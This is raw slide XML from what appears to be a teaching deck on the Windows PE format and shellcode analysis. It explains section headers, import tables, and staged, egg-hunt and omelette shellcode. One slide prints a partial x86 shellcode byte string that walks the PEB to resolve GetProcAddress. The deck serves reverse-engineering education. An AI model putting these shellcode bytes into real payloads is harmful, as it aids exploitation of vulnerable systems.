                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PointerToLinenumbers</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NumberOfRelocations</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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NumberOfLinenumbers</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>    DWORD   Characteristics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:effectLst/>
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="804000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>#define IMAGE_SIZEOF_SECTION_HEADER          40</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:effectLst/>
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>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1600200"/>
            <a:ext cx="3429000" cy="306743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68084121"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304801" y="4876800"/>
          <a:ext cx="8305799" cy="1600200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8305799"/>
              </a:tblGrid>
              <a:tr h="1524000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Executable code section, .text</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The .text section also contains the entry point mentioned earlier. The IAT also lives in the .text section immediately before the module entry point. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Data sections, .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>bss</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, .data</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>bss</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> section represents uninitialized data for the application, including all variables declared as static within a function or source module.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> section represents read-only data, such as literal strings, constants, and debug directory information.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>All other variables (except automatic variables, which appear on the stack) are stored in the .data section. Basically, these are application or module global variables.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rsrc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> section contains resource information for a module. It begins with a resource directory structure like most other sections, but this section's data is further structured into a resource tree. The IMAGE_RESOURCE_DIRECTORY, shown below, forms the root and nodes of the tree. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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0064446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5" y="453011"/>
            <a:ext cx="63246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PE exports &amp; imports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>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1" y="1295400"/>
            <a:ext cx="8458199" cy="4587907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="6096000"/>
            <a:ext cx="8915400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>To parse the imports table, we need to iterate through all the functions with two pointers: one for the name of the function and the other for the address of the function.</a:t>
            </a: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183933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457200"/>
            <a:ext cx="4267200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Verify shellcodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Verify shellcode.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="579914" y="1752600"/>
            <a:ext cx="7954486" cy="3648584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="5715000"/>
            <a:ext cx="7467600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Disassemble and understand shellcodes.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496669"/>
            <a:ext cx="3276600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1631752"/>
            <a:ext cx="8686800" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Shellcodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>In computer security, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> is commonly written in machine code.</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Staged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>When the amount of data that an attacker can inject into the target process is too limited to execute useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> directly, it may be possible to execute it in stages. First, a small piece of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> (stage 1) is executed. This code then downloads a larger piece of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> (stage 2) into the process's memory and executes it.</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Egg hunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>This is another form of staged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, which is used if an attacker can inject a larger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> into the process but cannot determine where in the process it will end up. Small egg-hunt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> is injected into the process at a predictable location and executed. This code then searches the process's address space for the larger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> (the egg) and executes it.</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Omlette</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>This type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> is similar to egg-hunt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, but looks for multiple small blocks of data (eggs) and recombines them into one larger block (the omelet) that is subsequently executed. This is used when an attacker can only inject a number of small blocks of data into the process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457200"/>
            <a:ext cx="5334000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Convert text shellcodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752600"/>
            <a:ext cx="8305800" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Step 1, text shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0">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"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\x70\x14\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x96\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x8B\x58\x10\x8B\x53"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\x20\x03\xF3\x33\xC9\x41\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x03\xC3\x81"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\x72\x6F\x63\x41\x75\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
